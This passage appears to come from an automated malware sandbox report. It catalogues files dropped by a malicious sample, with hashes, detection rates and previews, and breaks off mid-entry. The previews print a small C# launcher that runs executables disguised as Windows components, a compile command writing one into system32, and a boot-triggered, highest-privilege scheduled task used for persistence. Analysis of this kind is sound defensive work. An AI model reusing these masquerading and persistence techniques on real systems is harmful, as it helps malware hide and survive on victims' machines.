                                                                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"); } catch { } }).Start();. }.}.
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):250
                                                                                                  Entropy (8bit):5.115037233190624
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23f9FF7FKAn:Hu7L//TRq79cQWf1FGA
                                                                                                  MD5:BE2244D7FC5D50A209796F5C4749DA08
                                                                                                  SHA1:3A88923E7C2131C7958CF588F85A8B8615F4E80A
                                                                                                  SHA-256:E5E4D7F92F269C45E77025A641AAA681AD9B03CF86B75FB0ACE8A0A296543F1C
                                                                                                  SHA-512:DA785409E5BB6AF931D202F81F3A73E8906248598E128D6F3365BEFEF57C5522762D99E8562856FEFE37D5F8456B9BD9455916E60BCA9353A07916755D303975
                                                                                                  Malicious:false
                                                                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.0.cs"
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (360), with CRLF, CR line terminators
                                                                                                  Category:modified
                                                                                                  Size (bytes):781
                                                                                                  Entropy (8bit):5.266432427456426
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:KJfC6MI/un/Vq79tWf1Q1Kax5DqBVKVrdFAMBJTH:uCTN/VquW1K2DcVKdBJj
                                                                                                  MD5:C6F470C95973FA863B21808F388C7D3E
                                                                                                  SHA1:4D0D011F4DB00B609B93A2AAC652302E3B70DAD2
                                                                                                  SHA-256:4CD220AF5F699A254543B34E797007AAB801EE8309CB316428F2D368C192FA57
                                                                                                  SHA-512:8D224280AF6C648FCADB24AEBB80FC9EEE90B136D22C7D32CE8081C524D53D8A0D5EC79DAC3EB11BD6DFF81F16F89934DF0F2CC39089EF6802A0542E65A54833
                                                                                                  Malicious:false
                                                                                                  Preview:.C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                  Process:C:\ProgramData\setup.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):161792
                                                                                                  Entropy (8bit):5.8318794599287465
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:lQbW78Kb89UMmY8MA1cRWr7BiKcOO1Sf7lHn4mr3yo4f8P2:lQK75bobwfBiKCYfhHLU5
                                                                                                  MD5:1667C96053EAA078109F8B0C9500FC9D
                                                                                                  SHA1:E0F567763BAAAA757F66F96951D9810F45F69F30
                                                                                                  SHA-256:F7E1E53A6FB24A2BD9206305C59448A8F99B6F5847A6ACB18EB0FD9F7383FFB4
                                                                                                  SHA-512:6285ADE5CB85B71814EDD57EDDC512A031596043B7FCE4FCC909A0B78ECFE161C062AD0637EC82CBDAA36675AD32FBD0C94DDD96BB575BE8B1FBB47DF706AAE1
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                                                  Preview:MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$.......K...............D.......D...........o...9A......9A9.....9A......Rich............PE..d....t.d.........."....%.....X......X".........@..........................................`..................................................8.......p..`>...`..8....................5..8............................................0...............................text............................... ..`.rdata.......0......."..............@..@.data........P......................@....pdata..8....`.......6..............@..@.rsrc...`>...p...@...8..............@..@........................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\ProgramData\setup.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1490
                                                                                                  Entropy (8bit):5.1015990235428035
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
                                                                                                  MD5:546D67A48FF2BF7682CEA9FAC07B942E
                                                                                                  SHA1:A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
                                                                                                  SHA-256:EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
                                                                                                  SHA-512:10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
                                                                                                  Malicious:false
                                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):33792
                                                                                                  Entropy (8bit):5.541771649974822
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):34816
                                                                                                  Entropy (8bit):5.636032516496583
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32768
                                                                                                  Entropy (8bit):5.645950918301459
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32256
                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):38912
                                                                                                  Entropy (8bit):5.679286635687991
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):39936
                                                                                                  Entropy (8bit):5.660491370279985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):40448
                                                                                                  Entropy (8bit):5.7028690200758465
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):50176
                                                                                                  Entropy (8bit):5.723168999026349
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):39936
                                                                                                  Entropy (8bit):5.629584586954759
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):126976
                                                                                                  Entropy (8bit):6.057993947082715
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):70144
                                                                                                  Entropy (8bit):5.909536568846014
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64000
                                                                                                  Entropy (8bit):5.857602289000348
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):34304
                                                                                                  Entropy (8bit):5.618776214605176
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):69632
                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):41472
                                                                                                  Entropy (8bit):5.6808219961645605
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):33280
                                                                                                  Entropy (8bit):5.634433516692816
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
